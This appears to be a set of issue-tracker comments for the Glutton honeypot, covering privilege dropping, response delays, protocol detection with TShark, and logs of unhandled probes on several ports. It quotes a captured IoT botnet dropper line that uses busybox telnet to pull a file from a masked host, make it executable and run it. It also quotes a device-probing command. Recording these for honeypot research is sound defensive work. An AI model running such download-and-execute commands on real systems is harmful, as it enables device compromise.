Lukas Rist
If Glutton is started as root, we should drop privileges to the `nobody` user.
read /bin/busybox telnet x.x.x.x 6745 > test; /bin/busybox chmod 777 test ; ./test
satori
```
INFO[20219] [telnet ] recv: "/bin/busybox satori\x00\r\n"
INFO[20220] [telnet ] send: "> "
```
Seeing lots of those and no further stage. Ideas?
Add capability to add a delay to responses. The delay should be random within a range, either global or per port and transport layer.
Create a PCAP, pass it to TShark (https://www.wireshark.org/docs/man-pages/tshark.html) for dissection and use the protocol info to pick the right handler.
On port 3260
```
00000000 03 81 00 00 00 00 00 5f 40 00 01 37 00 00 00 00 |......._@..7....|
00000010 00 00 00 01 00 01 00...
```
```
DEBU[1386] [freki ] new connection 188.X.X.X:47651->5005
DEBU[1386] [contable] registering 188.X.X.X:47651->5005
DEBU[1386] [glutton ] new connection: 188.X.X.X:47651 -> 5005
```
```
00000000 4a 44 57 50 2d 48 61 6e 64 73...
```
```
DEBU[0648] [freki ] new connection 47.X.X.X:56695->9000
DEBU[0648] [contable] registering 47.X.X.X:56695->9000
DEBU[0648] [glutton ] new connection: 47.X.X.X:56695 -> 9000
```
```
00000000 52 45 4d 4f 54 45 20 48 49 5f...
```
@gento I see a bunch of those lately: `fgrep XDVR /mnt/mtd/dep2.sh\x00`. After that there is no additional step. I assume they expect a specific response payload.
Has anyone seen events that look like those described here? https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/